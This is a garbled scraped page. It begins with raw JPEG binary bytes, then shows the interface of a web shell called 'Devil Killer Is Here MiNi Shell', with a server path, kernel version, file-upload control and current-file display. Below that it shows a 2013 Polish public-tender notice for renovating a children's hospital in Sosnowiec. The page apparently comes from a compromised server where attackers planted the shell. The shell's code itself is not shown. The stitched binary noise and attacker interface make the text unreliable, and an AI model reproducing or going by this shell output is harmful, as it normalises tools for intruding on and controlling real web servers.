JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131223/534334-N-2013.html

<p class="kh_header"><b>Sosnowiec: na wykonanie robót budowlanych w ramach zadania pn. remont i adaptacja istniejących pomieszczeń Centrum Pediatrii im. Jana Pawła w Sosnowcu.</b><br>
<b>Numer ogłoszenia: 534334 - 2013; data zamieszczenia: 23.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Centrum Pediatrii im. Jana Pawła II , ul. G. Zapolskiej 3, 41-218 Sosnowiec, woj. śląskie, tel. 032 2660230, 2660251, faks 032 2663630,2660251.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.centrum-pediatrii.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> na wykonanie robót budowlanych w ramach zadania pn. remont i adaptacja istniejących pomieszczeń Centrum Pediatrii im. Jana Pawła w Sosnowcu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane w  n.w. pomieszczeniach:
a. przebudowa z adaptacją pomieszczeń (poziom  - 3.30) w budynku B, w którym aktualnie znajdują się magazyny na rozbudowę funkcji szatni dla  personelu medycznego wraz z węzłem sanitarnym, wydzielenie dodatkowych pomieszczeń dla  apteki oraz wydzielenie niezależnego wejścia do istniejącej serwerowi,
b. przebudowa dwóch pomieszczeń po poradni alergologicznej i laryngologicznej (poziom - 3.30) w budynku B na pomieszczenia biurowe,
c. przebudowa z adaptacją pomieszczeń (parter) w budynku A, w którym aktualnie znajdują się hydroterapia, kinezyterapia, fizykoterapia na poradnie specjalistyczne z gabinetami zabiegowymi,
d. Oddział Pediatrii (1 piętro) w budynku B
- adaptacja pokoju lekarzy na  inhalatornię oraz pokoju ordynatora na   pokój oddziałowej,
- przebudowa dwóch łazienek ( w tym jednej dla osób niepełnosprawnych) ,
- wydzielenie pokoju z części holu windowego ( pokój ordynatora)
- adaptacja pokoju inhalatorni na pokój lekarzy
2. Zakres wskazany w opisie przedmiotu zamówienia obejmuje w szczególności branże:
1. budowlaną:
a. wyburzenie konstrukcji murowej,
b. rozbiórkę posadzek i licowania ścian,
c. wykucie  z murów stolarki drzwiowej,
d. murowanie nowych ścian,
e. osadzenie stolarki drzwiowej,
f. wykonanie warstw wyrównawczych i nowych posadzek,
g. tynkowanie, położenie gładzi gipsowych ścian,
h. zabudowanie sufitów podwieszonych,
i. malowanie.
2.   elektryczną:
a. instalację gniazd wtykowych dla stanowisk komputerowych,
b. instalację gniazd wtykowych ogólnego przeznaczenia,
c. instalację zasilania  urządzeń wentylacyjnych,
d. instalację oświetlenia,	
e. instalację oświetlenia awaryjnego,
f. zasilanie obwodów elektrycznych w.w. 
3.  sanitarną:
a. instalację  wentylacji i klimatyzacji,
b. instalację centralnego ogrzewania,
c. instalację wodno - kanalizacyjną.
4.  gazów medycznych:
a. instalację tlenu,
b. instalację sprężonego powietrza,
c. instalację próżni.
3. Szczegółowy zakres i opis przedmiotu robót znajduje się w:
załączniku nr 1  do SIWZ - projekt budowlano - wykonawczy  przebudowy i adaptacji:
a. magazynów na szatnie  personelu i dodatkowych pomieszczeń apteki,
b. pomieszczeń  po poradni alergologicznej na pokoje  biurowe,
c. pomieszczeń po zakładzie hydroterapii, fizykoterapii, kinezyterapii na poradnie   
specjalistyczne.
załącznik nr 2 do SIWZ - specyfikacje techniczne wykonania i odbioru robót budowlanych
a. branża budowlana,
b. instalacje elektryczne,
c. instalacje wodno- kanalizacyjne,
d. instalacje wentylacji,
e. instalacje gazów medycznych.             
załącznik nr 3  do SIWZ - przedmiar robót
a. roboty budowlane,
b. instalacje elektryczne,
c. instalacje  wentylacji,
d. instalacje wodno- kanalizacyjne,
e. instalacje centralnego ogrzewania,
f. instalacje gazów medycznych.
załącznik nr 4 do SIWZ - projekt budowlano - wykonawczy adaptacji Oddziału Pediatrii
a. pokoju lekarzy na inhalatornię,
b. ordynatora na pokój oddziałowej,
c. przebudowa dwóch łazienek (w tym jednej dla osób niepełnosprawnych),
d. wydzielenie pokoju z części holu windowego,
e. adaptacja pokoju inhalatorni na pokój lekarzy.
załącznik nr 5 do SIWZ - specyfikacje techniczne wykonania i odbioru robót budowlanych:
a. roboty budowlane,
b. instalacje elektryczne,
c. instalacje wodno - kanalizacyjne i centralnego ogrzewania.
załącznik nr 6 do SIWZ - przedmiar robót
a. roboty budowlane
b. instalacje elektryczne
c. instalacje  wentylacji
d. instalacje wodno- kanalizacyjne  i centralnego ogrzewania.
Załączony  przedmiar robót  ma charakter pomocniczy dla Wykonawcy służący do kalkulacji ceny.   
Wyposażenie  w meble nie wchodzi w zakres zamówienia
Projekt budowlano-wykonawczy opracowany  jest przez:
Akcent Studio Pracownia Artystyczno - Architektoniczna S.C.
z siedzibą w Bytomiu ul. Piekarska 17 A.
4. Niniejszy przedmiot zamówienia obejmuje także wykonanie robót i czynności pomocniczych, przygotowawczych i porządkowych oraz naprawę ewentualnych uszkodzeń powstałych z winy Wykonawcy.
Zamawiający informuje Wykonawców o ich uprawnieniu do zapoznania się z miejscem budowy, stanem istniejącym i warunkami realizacji zamówienia.
Zamawiający informuje, że  ilekroć w niniejszej SIWZ i dokumentacji, o której mowa  w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent , nazwę producenta czy pochodzenie - należy przyjąć, że wskazane patenty, znaki towarowe, nazwa producenta czy  pochodzenie  są podane przykładowo i  jedynie określają parametry techniczne, eksploatacyjne, użytkowe,  które muszą być spełnione przez Wykonawcę.
Wykonawca zobowiązany jest zgodnie z art.30 ust.5 ustawy PZP  poinformować Zamawiającego o fakcie złożenia oferty równoważnej poprzez załączenie wykazu innych niż w SIWZ materiałów oraz kart katalogowych lub temu podobnych dokumentów. Materiały równoważne, to materiały o parametrach jakościowych tożsamych lub lepszych niż uwzględnienie w projektach. Udowodnienie równoważności leży po stronie Wykonawcy. Proponowane w ofercie równoważne materiały muszą spełniać wymagania określone w art. 30 ust 1-3 i ust 5 ustawy PZP. Złożone w toku postępowania dokumenty posłużą Zamawiającemu do dokonania oceny czy oferta jest równoważna. 
W przypadku, gdy zastosowanie materiałów lub urządzeń równoważnych wymagać będzie zmiany dokumentacji projektowej, koszty przeprojektowania poniesie Wykonawca. Wskazanie przez Wykonawcę materiałów równoważnych bez przedstawienia dokumentów na  potwierdzenie równoważności spowoduje wezwanie Wykonawcy do przedstawienia brakujących dokumentów w trybie art.26 ust.3  w związku z art.25 ust 1 ustawy PZP. Funkcje i cechy rozwiązań równoważnych wg wymogów Zamawiającego nie mogą odbiegać i być jakościowo niższe niż określone parametrami w poszczególnych specyfikacjach technicznych wykonania i odbioru robót stanowiące załącznik  nr  2 i załącznik nr 6 do SIWZ.
Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczność wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową.
Roboty zamienne to roboty budowlane skutkujące zwiększeniem bezpieczeństwa realizacji robót lub usprawnieniem procesu budowy w stosunku do przewidzianych w projekcie, a tak określone zmiany nie odstępują w sposób istotny od  projektu  przebudowy i adaptacji pomieszczeń.
Zamawiający dopuszcza możliwość ograniczenia zakresu rzeczowego przedmiotu umowy, w sytuacji gdy wykonanie danych robót będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami. 
Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy robót dodatkowych. Roboty dodatkowe to roboty określone w przedmiocie zamówienia opisanym w SIWZ wraz z załącznikami, wyjaśnieniami i wprowadzonymi modyfikacjami ale nie ujęte w przedmiarze i kosztorysie ofertowym lub ujęte w mniejszym zakresie niż w rzeczywistości.
Zamawiający nie przewiduje dokonania wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej. 
Zamawiający  nie przewiduje możliwości udzielenia zamówień uzupełniających. 
Zamawiający nie dopuszcza możliwości składania  ofert częściowych jak i ofert wariantowych.
Zamawiający nie  udziela zaliczek na poczet wykonania zamówienia.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje dynamicznego systemu zakupów.
Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
Wymagania stawiane  Wykonawcy dotyczące przedmiotu zamówienia
1.Wykonawca zobowiązany będzie własnym staraniem i na własny koszt między innymi do: 
1.1. prace wykonywane  będą na czynnym obiekcie szpitalnym. Wykonawca nie może doprowadzić do dezorganizacji pracy działających oddziałów i innych komórek organizacyjnych szpitala oraz sytuacji, która mogłaby zagrozić zdrowiu i życiu pacjentów oraz osobom  przebywających w szpitalu. 
1.2. przejęcia pomieszczeń  w terminie do 5 dni roboczych od daty podpisania umowy, utrzymania czystości i porządku na terenie budowy  oraz we własnym zakresie stworzenia zaplecza socjalnego dla swoich pracowników (szatnia, WC, itp.). Zamawiający nie będzie udostępniał żadnych pomieszczeń znajdujących się na jego terenie,
1.3. dostarczenia  materiałów niezbędnych do wykonania  przedmiotu umowy. Materiały będą posiadać atesty i świadectwa  dopuszczające do zastosowania w budownictwie wydane  przez upoważnione instytucje zgodnie z ustawą  prawo budowlane,
1.4.  zabezpieczenia istniejących  sieci w obrębie budowy,
1.5. natychmiastowego usunięcia nieczystości z dróg dojazdowych i chodników powstałych na skutek wykonywania przedmiotu umowy,
1.6.  pokrycia wszelkich opłat i kar nałożonych przez właściwe podmioty, organy, instytucje za dokonane przez Wykonawcę złamanie prawa, przekroczenie norm i przepisów w trakcie realizacji umowy oraz zawinione zaniedbania,
1.7. posprzątania każdego pomieszczenia po zakończeniu prac wraz z umyciem stolarki okiennej (od wewnątrz i od zewnątrz wraz z parapetami) i stolarki drzwiowej, 
1.8. wyposażenia osób biorących udział w realizacji przedmiotu umowy w jednolitą odzież roboczą z nadrukiem firmy,
1.9. wywozu i składowania odpadów budowlanych oraz innych materiałów zakwalifikowanych przez Zamawiającego jako odpad  na wysypisko wraz z utylizacją oraz  dostarczenia  Zamawiającemu dokumentów potwierdzających dokonanie wywozu na legalne wysypisko,
1.10. przekazania Zamawiającemu protokołem zdawczo - odbiorczym zdemontowanych urządzeń, wyposażenia oraz innych  elementów i materiałów, które nie zostaną  zakwalifikowane przez Zamawiającego jako odpad,
1.11. poniesienia ryzyka za swoje działania do momentu odbioru  przedmiotu umowy. Dotyczy to  kradzieży  dostarczonych przez niego lub dla niego materiałów, elementów oraz innych przedmiotów. Niniejsza regulacja obejmuje także przypadkową utratę lub  uszkodzenie, jak np. w wyniku działania siły natury,
1.12. opracowanie Planu bezpieczeństwa i ochrony zdrowia BIOZ stosując w czasie realizacji zamówienia wszelkie obowiązujące przepisy z zakresu prawa budowlanego, BHP, ochrony środowiska, ustawy o odpadach, p.poż oraz zapewnienia stałego nadzoru technicznego i bezpieczeństwa pracy,
1.13. wykonania dokumentacji powykonawczej.
2. Zamawiający na wniosek Wykonawcy udostępni miejsca poboru energii elektrycznej oraz wody na cele budowlane. Wykonawca będzie zobowiązany założyć na własny koszt podliczniki we wskazanych przez Zamawiającego miejscach. W oparciu o odczyt z liczników Zamawiający będzie naliczał opłatę za każdy miesiąc w wysokości aktualnie obowiązujących stawek za w.w. media, zwiększonych o podatek VAT.
3. Zamawiający nie wyraża zgody na korzystanie z wind szpitalnych w trakcie wykonywania przedmiotu umowy.
4. Zamawiający oczekuje ze strony Wykonawcy ścisłej współpracy z inspektorami nadzoru oraz kierownictwem Centrum Pediatrii.                        
Uwaga: Termin prac o dużym natężeniu dźwięku każdorazowo należy uzgadniać pisemnie z Dyrekcją Zamawiającego. Nie dopuszcza się wykonywania prac o dużym natężeniu dźwięku  między godziną 10°° - 13°° (zabiegi lecznicze)  i  21°°- 7°° (cisza nocna). 
Duże natężenie dźwięku określone jest powyżej  85 dB..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0, 45.00.00.00-7, 45.11.11.00-9, 45.11.12.20-6, 45.26.25.00-6, 45.41.00.00-4, 45.40.00.00-1, 45.42.11.00-5, 45.44.21.20-4, 45.30.00.00-0, 45.33.00.00-9, 45.33.11.00-7, 45.31.12.00-2, 45.42.11.46-9, 45.31.43.00-4, 45.31.21.00-8, 45.31.56.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 04.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium do dnia  08.01.2014r. do godz. 8:00  w wysokości  14.000,00 zł PLN (słownie: czternaście tysięcy złotych zero groszy)
Wadium może być wniesione w następujących formach:
1. pieniądzu,
2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3. gwarancjach bankowych,
4. gwarancjach ubezpieczeniowych,
5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U nr 109, poz.1158 z późn. zm)
6. innej niż pieniądz, oryginał dokumentu został złożony w oddzielnej kopercie w Kasie pokój nr 0.52 od poniedziałku do piątku w godz. od 7.30  do 14.00, a jego kopia w ofercie.
Wadium  wnoszone w pieniądzu wpłaca się  przelewem na rachunek bankowy Zamawiającego:
PKO BP Sosnowiec konto nr 07102024980000840201540947
z dopiskiem na przelewie: Roboty budowlane. 
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku bankowego Zamawiającego.
Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
- pieniężnej dokument potwierdzający wniesienie wadium został załączony do oferty,
- innej niż pieniądz, oryginał dokumentu został złożony w oddzielnej kopercie w Kasie pokój nr 0.52 od poniedziałku do piątku w godz. od 7.30  do 14.00, a jego kopia w ofercie.
Z treści gwarancji, poręczenia winno wynikać bezwarunkowe, na każde pisemne  żądanie zgłoszone przez Zamawiającego w terminie związania ofertą,  zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art.46 ust. 4a oraz ust.5 ustawy PZP.
Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowaną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy  określa ustawa Pzp.
Zamawiający niezwłocznie dokona zwrotu wadium lub zatrzyma wadium w przypadku wystąpienia okoliczności, o których mowa w art. 46 ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca udokumentuje wykonanie (zakończenie) w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej jedną robotę budowlaną polegającą na wykonaniu robót budowlanych podobnych do robót objętych przedmiotem zamówienia o wartości robót minimum 400.000,00 zł brutto. Wskazane w wykazie wykonane roboty będą spełniały wymagania Zamawiającego jeżeli będą obejmowały prace ogólnobudowlane, sanitarne i elektryczne. W wykazie należy podać rodzaju robót, wartości brutto (kwota zapłaty z tytułu jej wykonania), datę i miejsce wykonania. Załączyć dokument potwierdzający, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dokument powinien być wystawiony przez Zamawiającego lub Generalnego Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca, w rozumieniu ustawy z dnia 7 lipca 1994r.Prawo budowlane Dz.U.2003, nr 207, poz.2016 z późn. zm. wykaże że, dysponuje osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji w budownictwie: 
- która będzie pełnić funkcję  kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez  żadnych ograniczeń oraz co najmniej 5-letnie doświadczenie w pełnieniu funkcji kierownika budowy,
- która będzie pełnić funkcję kierownika robót, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalnościach: instalacyjnej w zakresie sieci, instalacji wodociągowych i kanalizacyjnych, instalacji i urządzeń cieplnych, wentylacyjnych  bez żadnych ograniczeń oraz co najmniej 3-letnie doświadczenie. 
- która będzie pełnić funkcję  kierownika robót, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalnościach: instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez żadnych ograniczeń oraz co najmniej 3-letnie doświadczenie. 
Powyższe funkcje może pełnić jedna lub kilka osób.
Warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia spoza terytorium RP.
Wykonawca złoży oświadczenie, że dysponuje osobą lub osobami która będzie/ będą pełnić funkcję kierownika budowy, posiada uprawnienia budowlane  bądź równoważne o specjalności konstrukcyjno - budowlanej bez  żadnych ograniczeń, posiada co  najmniej 5-letnie doświadczenie w pełnieniu funkcji kierownika budowy oraz, że osoba ta wykonuje faktycznie i zgodnie z prawem zawód lub działalność w państwie członkowskim i nie obowiązuje jej zakaz, nawet tymczasowy, wykonywania zawodu lub działalności i posiada dokument potwierdzający kwalifikacje zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca przedstawi opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia tj. posiada ubezpieczenie na kwotę co najmniej 400.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
